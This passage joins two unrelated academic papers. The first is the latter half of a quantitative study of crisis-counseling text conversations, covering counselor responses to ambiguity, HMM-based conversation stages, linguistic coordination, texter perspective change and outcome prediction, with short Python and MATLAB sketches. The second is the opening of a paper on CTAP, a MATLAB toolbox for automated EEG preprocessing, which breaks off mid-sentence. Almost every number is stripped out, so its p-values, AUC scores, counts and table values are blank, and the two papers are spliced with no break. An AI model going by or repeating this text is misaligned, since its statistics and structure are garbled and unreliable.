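        pos, neg = Counter(), Counter()
        for messages, is_positive in conversations:
            lo = chunk * len(messages) // n_chunks
            hi = (chunk + 1) * len(messages) // n_chunks
            words = " ".join(messages[lo:hi]).lower().split()
            (pos if is_positive else neg).update(words)
        distances.append(cosine_distance(tfidf(pos, idf), tfidf(neg, idf)))
    return distances
```

for adaptive counselors the returned distances are expected to grow from the early to the late chunks of the conversation, which is the pattern reported above.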
reacting to ambiguity

observing that successful counselors are better at adapting to the conversation, we next examine how counselors differ and what factors determine the differences. in particular, domain experts have suggested that more successful counselors are better at handling ambiguity in the conversation (levitt and jacques, ). here, we use ambiguity to refer to the uncertainty of the situation and the texter's actual core issue resulting from insufficient, short or uncertain descriptions. does initial ambiguity of the situation negatively affect the conversation? how do more successful counselors deal with ambiguous situations?

[figure: more ambiguous situations (length of situation setter) are less likely to result in positive conversations.]

[figure: all counselors react to short, ambiguous messages by writing more (relative to the texter message) but more successful counselors do it more than less successful counselors.]

ambiguity. throughout this section we measure ambiguity in the conversation as the shortness of the texter's responses in number of words. while ambiguity could also be measured through concreteness ratings of the words in each message (e.g., using concreteness ratings from brysbaert et al. ( )), we find that results are very similar and that length and concreteness are strongly related and hard to distinguish.

initial ambiguity and situation setter. it is challenging to measure ambiguity and reactions to ambiguity at arbitrary points throughout the conversation since it strongly depends on the context of the entire conversation (i.e., all earlier messages and questions). however, we can study nearly identical beginnings of conversations where we can directly compare how more successful and less successful counselors react given nearly identical situations (the texter first sharing their reason for texting in). we identify the situation setter within each conversation as the first long message by the texter (typically a response to a "can you tell me more about what is going on?" question by the counselor).

results. we find that ambiguity plays an important role in counseling conversations. figure shows that more ambiguous situations (shorter length of situation setter) are less likely to result in successful conversations (we obtain similar results when measuring concreteness (brysbaert et al., ) directly). further, we find that counselors generally react to short and ambiguous situation setters by writing significantly more than the texters (figure ; if counselors wrote exactly as much as the texter, we would expect a horizontal line y = ). however, more successful counselors react more strongly to ambiguous situations than less successful counselors.

how to respond to ambiguity. having observed that ambiguity plays an important role in counseling conversations, we now examine in greater detail how counselors respond to nearly identical situations. we match situation setters by representing them through tf-idf vectors on bigrams and find similar situation setters as nearest neighbors within a certain cosine distance in the induced space.
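a minimal matlab sketch of this matching step follows; it assumes X is an m-by-V matrix of bigram tf-idf vectors (one row per situation setter), and the distance threshold, cluster size and variable names are illustrative assumptions rather than the authors' code.

% minimal sketch: nearest-neighbour matching of situation setters by
% cosine distance on bigram tf-idf vectors (X is m-by-V).
thr = 0.3;                                            % illustrative cosine-distance threshold
Xn  = bsxfun(@rdivide, X, max(sqrt(sum(X.^2, 2)), eps));  % l2-normalise rows
D   = 1 - Xn * Xn';                                   % pairwise cosine distances
nNbr = sum(D < thr, 2) - 1;                           % neighbours within threshold (excluding self)
inCluster = nNbr >= 5;                                % keep setters in dense clusters (illustrative)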
we only consider situation setters that are part of a dense cluster with at least neighbors, allowing us to compare follow-up responses by the counselors ( / situation setters were part of one of such clusters). we also used distributed word embeddings (e.g., (mikolov et al., )) instead of tf-idf vectors but found the latter to produce better clusters. (the threshold was manually set after qualitative analysis of matches from randomly chosen clusters; results were not overly sensitive to threshold choice, choice of representation (e.g., word vectors), and distance measure (e.g., euclidean).)

based on counselor training materials we hypothesize that more successful counselors

• address ambiguity by writing more themselves,
• use more check questions (statements that tell the conversation partner that you understand them while avoiding the introduction of any opinion or advice (labov and fanshel, ); e.g. "that sounds like..."),
• check for suicidal thoughts early (e.g., "want to die"),
• thank the texter for showing the courage to talk to them (e.g., "appreciate"),
• use more hedges (mitigating words used to lessen the impact of an utterance; e.g., "maybe", "fairly"),
• and that they are less likely to respond with surprise (e.g., "oh, this sounds really awful").

a set of regular expressions is used to detect each class of responses (similar to the examples above).

[table: differences between more and less successful counselors (c; more s. and less s.) in responses to nearly identical situation setters by the texter (t). the last column contains significance levels of wilcoxon signed rank tests (*** p < . , – p > . ). rows: % conversations successful ***; #messages in conversation ***; situation setter length (#tokens) ***; c response length (#tokens) ***; t response length (#tokens) ***; % cosine sim. c resp. to context ***; % cosine sim. t resp. to context –; % c resp. w/ check question ***; % c resp. w/ suicide check ***; % c resp. w/ thanks ***; % c resp. w/ hedges ***; % c resp. w/ surprise –.]

results. we find several statistically significant differences in how counselors respond to nearly identical situation setters (see table ). while situation setters tend to be slightly longer for more successful counselors (suggesting that conversations are not perfectly randomly assigned), counselor responses are significantly longer and also spur longer texter responses. further, the more successful counselors respond in a way that is less similar to the original situation setter (measured by cosine similarity in tf-idf space) compared to less successful counselors (but the texter's response does not seem affected). we do find that more successful counselors use more check questions, check for suicide ideation more often, show the texter more appreciation, and use more hedges, but we did not find a significant difference with respect to responding with surprise.

[figure: more successful counselors use less common/templated responses (after the texter first explains the situation). this suggests that they respond in a more creative way. there is no significant difference between positive and negative conversations.]

response templates and creativity

in section .
, we observed that more successful counselors make use of certain templates (including check questions, checks for suicidal thoughts, affir- mation, and using hedges). while this could suggest that counselors should stick to such predefined tem- plates, we find that, in fact, more successful coun- selors do respond in more creative ways. we define a measure of how “templated” the counselors responses are by counting the number of similar responses in tf-idf space for the counselor reaction (c.f., section . ; again using a manually defined and validated threshold on cosine distance). figure shows that more successful counselors use less common/templated questions. this sug- gests that while more successful counselors ques- tions follow certain patterns, they are more creative in their response to each situation. this tailoring of responses requires more effort from the counselor, which is consistent with the results in figure that showed that more successful counselors put in more effort in composing longer messages as well. ensuring conversation progress after demonstrating content-level differences be- tween counselors, we now explore temporal differ- ences in how counselors progress through conversa- tions. using an unsupervised conversation model, we are able to discover distinct conversation stages and find differences between counselors in how they move through these stages. we further provide ev- idence that these differences could be related to power and authority by measuring linguistic coor- dination between the counselor and texter. . unsupervised conversation model counseling conversations follow a common struc- ture due to the nature of conversation as well as counselor training. typically, counselors first intro- duce themselves, get to know the texter and their situation, and then engage in constructive prob- lem solving. we employ unsupervised conversation modeling techniques to capture this stage-like struc- ture within conversations. our conversation model is a message-level hid- den markov model (hmm). figure illustrates the basic model where hidden states of the hmm rep- resent conversation stages. unlike in prior work on conversation modeling, we impose a fixed ordering on the stages and only allow transitions from the cur- rent stage to the next one (figure ). this causes it to learn a fixed dialogue structure common to all of the counseling sessions as opposed to conversa- tion topics. furthermore, we separately model coun- selor and texter messages by treating their turns in the conversation as distinct states. we train the con- versation model with expectation maximization, us- ing the forward-backward algorithm to produce the distributions during each expectation step. we ini- tialized the model with each stage producing mes- sages according to a unigram distribution estimated from all messages in the dataset and uniform transi- tion probabilities. the unigram language models are defined over all words occurring more than times (over % of words in the dataset), with other words replaced by an unknown token. results. we explored training the model with vari- ous numbers of stages and found five stages to pro- duce a distinct and easily interpretable representa- tion of a conversation’s progress. table shows the words most unique to each stage. the first and last stages consist of the basic introductions and wrap- ups common to all conversations. 
in stage , the texter introduces the main issue, while the counselor asks for clarifications and expresses empathy for the situation. in stage , the counselor and texter discuss the problem, particularly in relation to the other people involved. in stage , the counselor and texter discuss actionable strategies that could help the texter. this is a well-known part of crisis counselor training called "collaborative problem solving."

[figure: our conversation model generates a particular conversation c_k by first generating a sequence of hidden states s_1, s_2, ... according to a markov model. each state s_i then generates a message as a bag of words w_i,1, w_i,2, ... according to a unigram language model w_{s_i}.]

[figure: allowed state transitions for the conversation model. counselor and texter messages are produced by distinct states and conversations must progress through the stages in increasing order.]

[table: the top words for counselors and texters with the greatest increase in likelihood of appearing in each stage. the model successfully identifies interpretable stages consistent with counseling guidelines (qualitative interpretation based on stage assignment and model parameters; only words occurring more than five hundred times are shown).
interpretation | top words for texter | top words for counselor
introductions | hi, hello, name, listen, hey | hi, name, hello, hey, brings
problem introduction | dating, moved, date, liked, ended | gosh, terrible, hurtful, painful, ago
problem exploration | knows, worry, burden, teacher, group | react, cares, considered, supportive, wants
problem solving | write, writing, music, reading, play | hobbies, writing, activities, distract, music
wrap up | goodnight, bye, thank, thanks, appreciate | goodnight, , anytime, luck, ]

analyzing counselor progression. do counselors differ in how much time they spend at each stage? in order to explore how counselors progress through the stages, we use the viterbi algorithm to assign each conversation the most likely sequence of stages according to our conversation model. we then compute the average duration in messages of each stage for both more and less successful counselors. we control for the different distributions of positive and negative conversations among more successful and less successful counselors by giving the two classes of conversations equal weight and control for different conversation lengths by only including conversations between and messages long.

results. we find that more successful counselors are quicker to move past the earlier stages, particularly stage , and spend more time in later stages, particularly stage (figure ). this suggests they are able to more quickly get to know the texter and then spend more time in the problem solving phase of the conversation, which could be one of the reasons they are more successful.

[figure: more successful counselors are quicker to get to know the texter and issue (stage ) and use more of their time in the "problem solving" phase (stage ).]

coordination and power differences

one possible explanation for the more successful counselors' ability to quickly move through the early stages is that they have more "power" in the conversation and can thus exert more control over the progression of the conversation.
we explore this idea by analyzing linguistic coordination, which measures how much the conversation partners adapt to each other's conversational styles. research has shown that conversation participants who have a greater position of power coordinate less (i.e., they do not adapt their linguistic style to mimic the other conversational participant as strongly) (danescu-niculescu-mizil et al., ).

in our analysis, we use the "aggregated " coordination measure c(b, a) from danescu-niculescu-mizil ( ), which measures how much group b coordinates to group a (a higher number means more coordination). the measure is computed by counting how often specific markers (e.g., auxiliary verbs) are exhibited in conversations. if someone tends to use a particular marker right after their conversation partner uses that marker, it suggests they are coordinating to their partner. formally, let s be a set of exchanges, each involving an initial utterance u_1 by a ∈ a and a reply u_2 by b ∈ b. then the coordination of b to a according to a linguistic marker m is:

c_m(b, a) = p(e^m_{u_2→u_1} | e^m_{u_1}) − p(e^m_{u_2→u_1})

where e^m_{u_1} is the event that utterance u_1 exhibits m (i.e., contains a word from category m) and e^m_{u_2→u_1} is the event that reply u_2 to u_1 exhibits m. the probabilities are estimated across all exchanges in s. to aggregate across different markers, we average the coordination values of c_m(b, a) over all markers m to get a macro-average c(b, a). the coordination between groups b and a is then defined as the mean of the coordinations of all members of group b towards the group a. we use eight markers from danescu-niculescu-mizil ( ), which are considered to be processed by humans in a generally non-conscious fashion: articles, auxiliary verbs, conjunctions, high-frequency adverbs, indefinite pronouns, personal pronouns, prepositions, and quantifiers.

results. texters coordinate less than counselors, with texters having a coordination value of c(texter, counselor) = . compared to the counselor's c(counselor, texter) = . , suggesting that the texters hold more "power" in the conversation. however, more successful counselors coordinate less than less successful ones (c(more succ. counselors, texter) = . vs. c(less succ. counselors, texter) = . ). all differences are statistically significant (p < . ; mann-whitney u test). this suggests that more successful counselors act with more control over the conversation, which could explain why they are quicker to make it through the initial conversation stages.

facilitating perspective change

thus far, we have studied conversation dynamics and their relation to conversation success from the counselor perspective. in this section, we show that perspective change in the texter over time is associated with a higher likelihood of conversation success. prior work has shown that day-to-day changes in writing style are associated with positive health outcomes (campbell and pennebaker, ), and existing theories link depression to a negative view of the future (pyszczynski et al., ) and a self-focusing style (pyszczynski and greenberg, ). here, we propose a novel measure to quantify three orthogonal aspects of perspective change within a single conversation: time, self, and sentiment. further, we show that the counselor might be able to actively induce perspective change.

time.
texters start explaining their issue largely in terms of the past and present but over time talk more about the future (see figure a; each plot shows the relative amount of words in the liwc past, present, and future categories (tausczik and pennebaker, )). we find that texters writing more about the future are more likely to feel better after the conversation. this suggests that changing the perspective from issues in the past towards the future is associated with a higher likelihood of suc- cessfully working through the crisis. self. another important aspect of behavior change is to what degree the texter is able to change their perspective from talking about themselves to con- sidering others and potentially the effect of their sit- uation on others (pyszczynski and greenberg, ; campbell and pennebaker, ). we measure how much the texter is focused on themselves by the rela- tive amount of first person singular pronouns (i, me, mine) versus third person singular/plural pronouns (she, her, him / they, their), again using liwc. fig- ure b shows that a smaller amount of self-focus is associated with more successful conversations (pro- viding support for the self-focus model of depres- sion (pyszczynski and greenberg, )). we hy- pothesize that the lack of difference at the end of the conversation is due to conversation norms such as thanking the counselor (“i really appreciate it.”) even if the texter does not actually feel better. sentiment. lastly, we investigate how much a change in sentiment of the texter throughout the con- versation is associated with conversation success. we measure sentiment as the relative fraction of pos- itive words using the liwc posemo and negemo sentiment lexicons. the results in figure c show that texters always start out more negative (value be- low . ), but that the sentiment becomes more posi- tive over time for both positive and negative conver- sations. however, we find that the separation be- tween both groups grows larger over time, which suggests that a positive perspective change through- out the conversation is related to higher likelihood of conversation success. we find that both curves increase significantly at the very end of the con- versation. again, we attribute this to conversation norms such as thanking the counselor for listening even when the texter does not actually feel better. together with the result on talking about the fu- ture, these findings are consistent with the theory of pyszczynski et al. ( ) that depression is related to a negative view of the future. role of a counselor. given that positive conver- sations often exhibit perspective change, a natural question is how counselors can encourage perspec- tive change in the texter. we investigate this by ex- ploring the hypothesis that the texter will tend to talk more about something (e.g., the future), if the coun- selor first talks about it. we measure this tendency using the same coordination measures as section . except that instead of using stylistic liwc markers (e.g., auxiliary verbs, quantifiers), we use the liwc markers relevant to the particular aspect of perspec- tive change (e.g., future, heshe, posemo). in all cases we find a statistically significant (p < . ; mann-whitney u-test) increase in the likelihood of the texter using a liwc marker if the counselor used it in the previous message (~ - % change). 
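as an illustration, the following matlab sketch estimates this marker-adoption effect for one liwc category; the per-message indicator variables and their names are illustrative assumptions, not the authors' code.

% minimal sketch: does the texter use a liwc marker more often right
% after the counselor used it? exhibits_c(i) and exhibits_t(i) are
% logical flags for whether counselor message i and the texter reply
% to it contain a word from the marker category (illustrative names).
p_reply_given_marker = mean(exhibits_t(exhibits_c));    % p(reply exhibits m | counselor msg exhibits m)
p_reply              = mean(exhibits_t);                % baseline p(reply exhibits m)
coordination_m       = p_reply_given_marker - p_reply;  % per-marker coordination estimate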
this link between perspective change and how the counselor conducts the conversation suggests that the counselor might be able to actively induce measurable perspective change in the texter.

[figure: a: throughout the conversation there is a shift from talking about the past to the future, where in positive conversations this shift is greater; b: texters that talk more about others more often feel better after the conversation; c: more positive sentiment by the texter throughout the conversation is associated with successful conversations. (panel a: past, present and future relative frequency; panel b: self relative frequency; panel c: posemo relative frequency; all over the portion of the conversation, for positive vs. negative conversations.)]

predicting counseling success

in this section, we combine our quantitative insights into a prediction task. we show that the linguistic aspects of crisis counseling explored in previous sections have predictive power at the level of individual conversations by evaluating their effectiveness as features in classifying the outcome of conversations. specifically, we create a balanced dataset of positive and negative conversations more than messages long and train a logistic regression model to predict the outcome given the first x% of messages in the conversation. there are such negative conversations and we randomly subsample the larger set of positive conversations. we train the model with batch gradient descent and use l regularization when n-gram features are present and l regularization otherwise. we evaluate our model with -fold cross-validation and compare models using the area under the roc curve (auc).

features. we include three aspects of counselor messages discussed in section : hedges, check questions, and the similarity between the counselor's message and the previous texter message. we add a measure of how much progress the counselor has made (section ) by computing the viterbi path of stages for the conversation (only for the first x%) with the hmm conversation model and then adding the duration of each stage (in #messages) as a feature. additionally, we add average message length and average sentiment per message using vader sentiment (hutto and gilbert, ). further, we add temporal dynamics to the model by adding feature conjunctions with the stages hmm model. after running the stages model over the x% of the conversation available to the classifier, we add each feature's average value over each stage as additional features. lastly, we explore the benefits of adding surface-level text features to the model by adding unigram and bigram features.

[figure: prediction accuracies vs. percent of the conversation seen by the model (without texter features).]
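as a rough illustration of this prediction setup, the following matlab sketch trains a logistic regression on a counselor-feature matrix and scores it with roc auc. it uses generic statistics toolbox calls (glmfit, glmval, perfcurve) and a simple unregularized hold-out split as a stand-in for the paper's cross-validated, regularized training; the variable names are illustrative assumptions.

% minimal sketch: predict conversation outcome from counselor features.
% X is n-by-d (features computed on the first x% of each conversation),
% y is n-by-1 with 1 = positive conversation, 0 = negative.
n      = numel(y);
isTest = false(n, 1);
isTest(randperm(n, round(0.2 * n))) = true;              % simple 80/20 hold-out
b      = glmfit(X(~isTest, :), y(~isTest), 'binomial');  % logistic regression fit
scores = glmval(b, X(isTest, :), 'logit');               % predicted probabilities
[~, ~, ~, auc] = perfcurve(y(isTest), scores, 1);        % area under the roc curve
fprintf('hold-out roc auc: %.3f\n', auc);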
because the focus of this work is on counseling strategies, we primarily experiment with models using only features from counselor messages. for completeness, we also report results for a model including texter features.

prediction results. the model's accuracy increases with x, and we show that the model is able to distinguish positive and negative conversations after only seeing the first % of the conversation (see figure ). we attribute the significant increase in performance for x = (accuracy = . , auc = . ) to strong linguistic cues that appear as a conversation wraps up (e.g., "i'm glad you feel better."). to avoid this issue, our detailed feature analysis is performed at x = .

[table: performance of nested models predicting conversation outcome given the first % of the conversation. in bold: full models with only counselor features and with additional texter features.
features | roc auc
counselor unigrams only | .
counselor unigrams and bigrams only | .
none | .
+ hedges | . (+ . )
+ check questions | . (+ . )
+ similarity to last message | . (+ . )
+ duration of each stage | . (+ . )
+ sentiment | . (+ . )
+ message length | . (+ . )
+ stages feature conjunction | . (+ . )
+ counselor unigrams and bigrams | . (+ . )
+ texter unigrams and bigrams | . (+ . )]

feature analysis. the model performance as features are incrementally added to the model is shown in table . all features improve model accuracy significantly (p < . ; paired bootstrap resampling test). adding n-gram features produces the largest boost in auc and significantly improves over a model just using n-gram features ( . vs. . auc). note that most features in the full model are based on word frequency counts that can be derived from n-grams, which explains why a simple n-gram model already performs quite well. however, our model performs well with only a small set of linguistic features, demonstrating they provide a substantial amount of the predictive power. the effectiveness of these features shows that, in addition to exhibiting group-level differences reported earlier in this paper, they provide useful signal for predicting the outcome of individual conversations.

conclusion & future work

knowledge about how to conduct a successful counseling conversation has been limited by the fact that studies have remained largely qualitative and small-scale. in this work, we presented a large-scale quantitative study on the discourse of counseling conversations. we developed a set of novel computational discourse analysis methods suited for large-scale datasets and used them to discover actionable conversation strategies that are associated with better conversation outcomes. we hope that this work will inspire future generations of tools available to people in crisis as well as their counselors. for example, our insights could help improve counselor training and give rise to real-time counseling quality monitoring and answer suggestion support tools.

acknowledgements. we thank bob filbin for facilitating the research, cristian danescu-niculescu-mizil for many helpful discussions, and dan jurafsky, chris manning, justin cheng, peter clark, david hallac, caroline suen, yilun wang and the anonymous reviewers for their valuable feedback on the manuscript. this research has been supported in part by nsf cns- , iis- , nih bd k, aro muri, darpa xdata, darpa simplex, stanford data science initiative, boeing, lightspeed, sap, and volkswagen.

references

tim althoff and jure leskovec. .
donor retention in online crowdfunding communities: a case study of donorschoose.org. in www. tim althoff, cristian danescu-niculescu-mizil, and dan jurafsky. . how to ask for a favor: a case study on the success of altruistic requests. in icwsm. vikas ganjigunte ashok, song feng, and yejin choi. . success with style: using writing style to pre- dict the success of novels. in emnlp. regina barzilay and lillian lee. . catching the drift: probabilistic content models, with applications to generation and summarization. in hlt-naacl. aaron t. beck. . depression: clinical, experimen- tal, and theoretical aspects. university of pennsylva- nia press. philip bramsen, martha escobar-molano, ami patel, and rafael alonso. . extracting social power rela- tionships from natural language. in hlt-naacl. marc brysbaert, amy beth warriner, and victor kuper- man. . concreteness ratings for thousand generally known english word lemmas. behavior re- search methods, ( ). r. sherlock campbell and james w. pennebaker. . the secret life of pronouns: flexibility in writing style and physical health. psychological science, ( ). ge chen. . visualizations for mental health topic models. master’s thesis, mit. cristian danescu-niculescu-mizil, lillian lee, bo pang, and jon kleinberg. . echoes of power: language effects and power differences in social interaction. in www. cristian danescu-niculescu-mizil. . a computa- tional approach to linguistic style coordination. ph.d. thesis, cornell university. karthik dinakar, allison j.b. chaney, henry lieberman, and david m. blei. a. real-time topic models for crisis counseling. in kdd dssg workshop. karthik dinakar, emily weinstein, henry lieberman, and robert selman. b. stacked generalization learning to analyze teenage distress. in icwsm. karthik dinakar, jackie chen, henry lieberman, ros- alind picard, and robert filbin. . mixed- initiative real-time topic modeling & visualization for crisis counseling. in acm iciui. marco guerini, alberto pepe, and bruno lepri. . do linguistic style and readability of scientific ab- stracts affect their virality? in icwsm. shane haberstroh, thelma duffey, marcheta evans, robert gee, and heather trepal. . the experi- ence of online counseling. journal of mental health counseling, ( ). christine howes, matthew purver, and rose mccabe. . linguistic indicators of severity and progress in online text-based therapy for depression. clpsych workshop at acl . rongyao huang. . language use in teenage crisis intervention and the immediate outcome: a machine automated analysis of large scale text data. master’s thesis, columbia university. c.j. hutto and eric gilbert. . vader: a parsimo- nious rule-based model for sentiment analysis of social media text. in icwsm. thomas r. insel. . assessing the economic costs of serious mental illness. the american journal of psychiatry, ( ). john kalafat, madelyn gould, jimmie lou harris mun- fakh, and marjorie kleinman. . an evaluation of crisis hotline outcomes part : nonsuicidal crisis callers. suicide and life-threatening behavior, ( ). william labov and david fanshel. . therapeutic discourse: psychotherapy as conversation. dana heller levitt and jodi d. jacques. . promot- ing tolerance for ambiguity in counselor training pro- grams. the journal of humanistic counseling, edu- cation and development, ( ). tomas mikolov, ilya sutskever, kai chen, greg cor- rado, and jeff dean. . distributed representa- tions of words and phrases and their compositionality. in nips. national institute of mental health. . 
any mental illness (ami) among u.s. adults. http://www.nimh.nih.gov/health/ statistics/prevalence/any-mental- illness-ami-among-us-adults.shtml. retrieved june , . kate g. niederhoffer and james w. pennebaker. . linguistic style matching in social interaction. jour- nal of language and social psychology, ( ). michael j. paul. . mixed membership markov models for unsupervised conversation modeling. in emnlp-conll. james w. pennebaker, matthias r. mehl, and kate g. niederhoffer. . psychological aspects of natural language use: our words, our selves. annual review of psychology, ( ). john p. pestian, pawel matykiewicz, michelle linn-gust, brett south, ozlem uzuner, jan wiebe, kevin b. co- hen, john hurdle, and christopher brew. . senti- ment analysis of suicide notes: a shared task. biomed- ical informatics insights, (suppl. ). tom pyszczynski and jeff greenberg. . self- regulatory perseveration and the depressive self- focusing style: a self-awareness theory of reactive de- pression. psychological bulletin, ( ). tom pyszczynski, kathleen holt, and jeff greenberg. . depression, self-focused attention, and ex- pectancies for positive and negative future life events for self and others. journal of personality and social psychology, ( ). nairan ramirez-esparza, cindy chung, ewa kacewicz, and james w. pennebaker. . the psychology of word use in depression forums in english and in span- ish: testing two text analytic approaches. in icwsm. shiquan ren, hong lai, wenjing tong, mostafa amin- zadeh, xuezhang hou, and shenghan lai. . non- parametric bootstrapping for hierarchical data. jour- nal of applied statistics, ( ). alan ritter, colin cherry, and bill dolan. . unsu- pervised modeling of twitter conversations. in hlt- naacl. harvey sacks and gail jefferson. . lectures on con- versation. wiley-blackwell. andreas stolcke, klaus ries, noah coccaro, eliza- beth shriberg, rebecca bates, daniel jurafsky, paul taylor, rachel martin, carol van ess-dykema, and marie meteer. . dialogue act modeling for automatic tagging and recognition of conversational speech. computational linguistics, ( ). yla r. tausczik and james w. pennebaker. . the psychological meaning of words: liwc and comput- erized text analysis methods. journal of language and social psychology, ( ). http://www.nimh.nih.gov/health/statistics/prevalence/any-mental-illness-ami-among-us-adults.shtml http://www.nimh.nih.gov/health/statistics/prevalence/any-mental-illness-ami-among-us-adults.shtml http://www.nimh.nih.gov/health/statistics/prevalence/any-mental-illness-ami-among-us-adults.shtml teun van dijk. . discourse studies: a multidisci- plinary approach. sage. world health organization. . depression: fact sheet no . http://www.who.int/ mediacentre/factsheets/fs /en/. re- trieved november , . jaewon yang, julian mcauley, jure leskovec, paea lependu, and nigam shah. . finding pro- gression stages in time-evolving event sequences. in www. 
computational testing for automated preprocessing: a matlab toolbox to enable large scale electroencephalography data processing

benjamin u. cowley , , jussi korpela and jari torniainen
brainwork research centre, finnish institute of occupational health, helsinki, finland
cognitive brain research unit, faculty of medicine, university of helsinki, helsinki, finland
biophysics of bone and cartilage group, department of applied physics, university of eastern finland, kuopio, finland

abstract
electroencephalography (eeg) is a rich source of information regarding brain function. however, the preprocessing of eeg data can be quite complicated, due to several factors. for example, the distinction between true neural sources and noise is indeterminate; eeg data can also be very large. the various factors create a large number of subjective decisions with consequent risk of compound error. existing tools present the experimenter with a large choice of analysis methods. yet it remains a challenge for the researcher to integrate methods for batch-processing of the average large datasets, and compare methods to choose an optimal approach across the many possible parameter configurations. additionally, many tools still require a high degree of manual decision making for, e.g. the classification of artefacts in channels, epochs or segments. this introduces extra subjectivity, is slow and is not reproducible. batching and well-designed automation can help to regularise eeg preprocessing, and thus reduce human effort, subjectivity and consequent error. we present the computational testing for automated preprocessing (ctap) toolbox, to facilitate: (i) batch-processing that is easy for experts and novices alike; (ii) testing and manual comparison of preprocessing methods. ctap extends the existing data structure and functions from the well-known eeglab toolbox, based on matlab and produces extensive quality control outputs. ctap is available under mit licence from https://github.com/bwrc/ctap.

subjects bioinformatics, brain–computer interface
keywords computation, testing, automation, preprocessing, eeglab, electroencephalography, signal processing

introduction

measurement of human electroencephalography (eeg) is a rich source of information regarding certain aspects of brain functioning, and is the most lightweight and affordable method of brain imaging. although it can be possible to see certain large effects without preprocessing at all, in the general-case eeg analysis requires careful preprocessing, with some degree of trial-and-error. such difficult eeg preprocessing needs to be supported with appropriate tools. the kinds of tools required for signal processing depends on the properties of data, and the general-case properties of eeg are demanding: large datasets and indeterminate data contribute to the number and complexity of operations.
in most research applications eeg data can be very large; systems are available with over channels. this can result in the need to examine thousands or tens of thousands of data-points; for instance, visual examination of raw data quality for subjects × channels × , s ≅ , plot windows (where each window shows channels × s). also, normally eeg can require many operations (see e.g. cowley et al., for a review), such as referencing, event-handling, filtering, dimensional reduction and artefact detection in channels, epochs or otherwise; all of which is time-consuming and therefore costly. many of these operations require repeated human judgements, e.g. selection of artefactual independent components (ics) (chaumon, bishop & busch, ), leading to subjectivity, non-reproducibility of outcomes and non-uniformity of decisions. nor is it possible that all such operations can ever be completely automated, as it is not possible to provide a ground-truth for computational methods by unique determination of the neural sources of eeg. with many relatively complex standard operations, code for eeg processing can also be harder to debug (widmann & schröger, ). these issues illustrate the need for a software tool, a workflow management system, that helps to integrate the wealth of existing methods. some standards have been suggested (keil et al., ), however bigdely-shamlo et al. ( ) have pointed out that 'artefact removal and validation of processing approaches remain a long-standing open problem for eeg'. the eeglab toolbox (delorme & makeig, ) and its various plug-ins provide a wealth of functions, but in this ecosystem it remains difficult and time-consuming to build the necessary infrastructure to manage, regularise and streamline eeg preprocessing. a workflow management system for data-processing pipelines helps to ensure that the researcher/analyst saves most of their cognitive effort for choosing analysis steps (not implementing them) and assessing their outcome (not debugging them). a regularised workflow maximises the degree to which each file is treated the same; for eeg this means to minimise drift in file-wise subjective judgements, such as estimating the accuracy of artefact detection algorithm(s) by visual inspection. a streamlined workflow can be enabled by separating the building of functions (for analysis or data management) from exploring and tuning the data. these features improve reproducibility and separate the menial from the important tasks. to meet these needs, in this paper we present the computational testing for automated preprocessing (ctap) toolbox.
approach

the ctap toolbox is available as a github repository at https://github.com/bwrc/ctap. it is built on matlab (r a and higher) and eeglab v . . b; limited functions, especially non-graphical, may work on older versions but are untested. the aim of ctap is to regularise and streamline eeg preprocessing in the eeglab ecosystem. in practice, the ctap toolbox extends eeglab to provide functionality for: (i) batch-processing using scripted eeglab-compatible functions; (ii) testing and comparison of preprocessing methods based on extensive quality control outputs. the key benefits include:

• ability to run a subset of a larger analysis
• bookkeeping of intermediate result files
• error handling
• visualisations of the effects of analysis steps
• simple to customise and extend
• reusable code
• feature and raw data export

we will next briefly motivate each of the benefits above.

incomplete runs: a frequent task is to make a partial run of a larger analysis. this happens, for example, when new data arrives or when the analysis fails for a few measurements. the incomplete run might involve a subset of (a) subjects, (b) measurements, (c) analysis branches, (d) collections of analysis steps, (e) single steps; or any combination of these. ctap provides tools to make these partial runs while keeping track of the intermediate saves.

bookkeeping: a given eeg analysis workflow can have several steps, branches to explore alternatives and a frequent need to reorganise analysis steps or to add additional steps in between. combined with incomplete runs, these requirements call for a system that can find the correct input file based on step order alone. ctap does this and saves researchers time and energy for more productive tasks.

error handling: frequently, simple coding errors or abnormal measurements can cause a long batch run to fail midway. ctap catches such errors, saves their content into log files for later reference and continues the batch run. for debugging purposes it is also possible to override this behaviour and use matlab's built-in debugging tools to solve the issue.

visualisations: it is always good practice to check how the analysis alters the data. ctap provides several basic visualisations for this task giving the user additional insight into what is going on. see 'results' for examples.

customisation: in research it is vital to be able to customise and extend the tools in use. extending ctap with custom functions is easy as the interface that ctap_*.m functions must implement is simple. intermediate results are stored in eeglab format and can be directly opened with the eeglab graphical user interface (gui) for inspection or manual processing.

code reuse: the ctap_*.m functions act as wrappers that make it possible to combine methods to build analysis workflows. most analysis steps are actually implemented as standalone functions, such that they can be used also outside ctap. in contrast to eeglab, ctap functions do not pop-up configuration windows that interfere with automated workflows.

export facilities: exporting results might prove time-consuming in matlab as there are no high-level tools to work with mixed text and numeric data. to this end, ctap provides its own format of storing data and several export options. small datasets can be exported as, e.g. comma delimited text (csv) while larger sets are more practically saved in an sqlite database. ctap also offers the possibility to store single-trial and average event-related potential (erp) data in hdf format, which makes the export to r and python simple.

in summary, ctap lets the user focus on content, instead of time-consuming implementation of foundation functionality. in the rest of the paper, we describe how the ctap toolbox does this using a synthetic dataset as a running example. we start with related work followed by the 'materials and methods' section detailing the architecture and usage of ctap. the 'results' section then describes the technical details and outcomes of a motivating example application. in the 'discussion' section we set out the philosophy and possible uses of the ctap toolbox, including development as well as preprocessing; and describe issues and potential directions for future work.

related work

many methods are available from the literature to facilitate automated preprocessing (agapov et al., ; baillet et al., ; barua & begum, ), and the rate of new contributions is also high. in a milestone special issue, baillet, friston & oostenveld ( ) gathered many of the academic contributions available at that time. this special issue is quite skewed towards tools for feature extraction, which illustrates again the need for better/more up-to-date solutions for the fundamental stages of eeg processing. among tools dedicated to eeg processing, eeglab stands out for its large user community and high number of third-party contributors, to the degree that it is considered by some to be a de facto standard. although eeglab functions can be called from the command-line interface and thus built into a preprocessing pipeline by the user's own scripts, in practice this is a non-trivial, error-prone task. other popular tools focus on a more diverse set of signals, especially including magnetoencephalography (meg). brainstorm (tadel et al., ), fieldtrip (oostenveld et al., ) and emegs (electromagnetic encephalography software) (peyk, de cesarei & junghöfer, ) are all open source tools for eeg and meg data analysis. brainstorm in particular, but also the others, have originated with an emphasis on cortical source estimation techniques and their integration with anatomical data. like eeglab, these tools are all free and open source, but based on the commercial platform matlab (natick, ma, usa), which can be a limitation in some contexts due to high licence cost. the most notable commercial tool is brainvision analyzer (brain products gmbh, munich, germany), a graphical programming interface with a large number of features. tools which are completely free and open source are fewer in number and have received much 